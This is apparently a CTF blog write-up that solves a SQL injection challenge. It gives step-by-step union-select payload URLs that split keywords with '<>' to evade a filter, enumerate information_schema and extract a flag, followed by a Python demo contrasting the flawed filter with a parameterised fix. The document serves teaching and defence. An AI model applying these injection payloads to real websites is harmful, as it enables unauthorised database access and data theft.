CTF Web Journey 2

Challenge URL

https://www.ichunqiu.com/battalion?t=1
"Baidu Cup" CTF, September round. Challenge name: SQL Injection

 

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

The page echoes its content normally.

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

Nothing is echoed back, which indicates that an injection point exists.

 

Determine the number of columns

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

Split order with <> so that the keyword is not filtered out.

Determine the display position

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

2 is echoed back, so column 2 is the display position.

Dump the database name

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

Dump the tables

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

Dump the columns

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

Dump the final data

http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

The flag is obtained.
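Why splitting a keyword with <> gets past the filter, and what closes the hole, shown as an added example that is not the challenge's own code. It assumes the server deletes the keywords first and strips <> afterwards; the SQLite tables, the column names and the function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in database; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'world');
        CREATE TABLE info (id INTEGER, secret TEXT);
        INSERT INTO info VALUES (1, 'flag{constructed-sample}');
    """)
    return db

def weak_filter(value):
    """Assumed filter: delete keywords first, then strip '<>'.
    The second step re-joins 'sel<>ect' into 'select' after the check ran."""
    value = re.sub(r"select|order", "", value, flags=re.I)
    return value.replace("<>", "")

def vulnerable_lookup(db, raw_id):
    """Concatenates filtered input into the SQL text (the flawed pattern)."""
    sql = "SELECT id, title, body FROM news WHERE id = " + weak_filter(raw_id)
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # broken SQL shows up as an empty page

def hardened_lookup(db, raw_id):
    """Allow-list the id as digits only and bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for raw in ["1", "-1 union select 1,secret,3 from info",
                "-1 union sel<>ect 1,secret,3 from info"]:
        print(repr(raw), vulnerable_lookup(db, raw), hardened_lookup(db, raw))
```

The blacklist fails because it inspects the input before a later transformation changes it; the hardened lookup never places user input in the SQL text, so the order of filtering steps no longer matters.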

The figure below shows the structure of the information_schema database.

 

posted @ 2021-01-27 16:36  C10ud